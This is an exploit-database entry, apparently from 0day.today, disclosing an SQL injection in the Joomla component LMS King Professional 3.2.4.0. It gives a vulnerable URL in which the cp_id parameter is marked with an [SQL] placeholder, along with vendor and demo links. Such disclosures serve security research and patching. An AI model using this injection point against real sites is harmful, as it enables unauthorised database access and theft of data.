id: 28236
date: 08/02/2017
title: Joomla LMS King Professional 3.2.4.0 Component - SQL Injection Vulnerability
author: Ihsan Sencan
cves: 

# # # # #
# Exploit Title: Joomla! Component LMS King Professional v3.2.4.0 - SQL Injection
# Dork: N/A
# Date: 02.08.2017
# Vendor : http://king-products.net/
# Software: https://extensions.joomla.org/extensions/extension/living/education-a-culture/lms-king-professional-for-joomla/
# Demo: http://demo.king-products.net/
# Version: 3.2.4.0
# # # # #
# Author: Ihsan Sencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_lmsking&view=lmsking&layout=learningpath&task=learningPath&cp_id=[SQL]
# Etc..
# # # # #

#  0day.today [2023-03-24]  #